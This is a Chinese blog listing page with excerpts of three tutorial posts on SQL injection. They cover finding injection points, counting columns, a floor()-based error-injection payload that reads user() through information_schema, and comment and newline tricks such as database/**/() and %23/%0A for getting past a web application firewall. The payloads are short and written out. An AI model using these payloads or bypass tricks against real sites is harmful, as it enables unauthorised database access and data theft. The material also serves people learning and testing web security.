摘要:
如果被拦截,首先可以更改提交方式如果拦截相应函数(比如database()),可以使用注释符进行绕过(database/**/()){/**/是注释符} union select 1,2,3 (union select)被拦截可以union #a %23a%0A %0A是换行符 用#闭合a,让安全狗 阅读全文
posted @ 2022-12-31 13:18
掘掘子
阅读(62)
评论(0)
推荐(1)
摘要:
常用的三个报错注入语句: floor报错 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ union select 阅读全文
posted @ 2022-12-31 13:13
掘掘子
阅读(171)
评论(0)
推荐(1)
摘要:
1.判断注入点 猜解列名数量.... ?id=1 order by x (x为数字) 2.报错猜解...?id=-1 selecet 1,2,..,x 3.信息收集数据库版本:version()数据库名字:database()数据库用户:user()操作系统:@@version_compile_os 阅读全文
posted @ 2022-12-31 13:01
掘掘子
阅读(69)
评论(0)
推荐(1)
浙公网安备 33010602011771号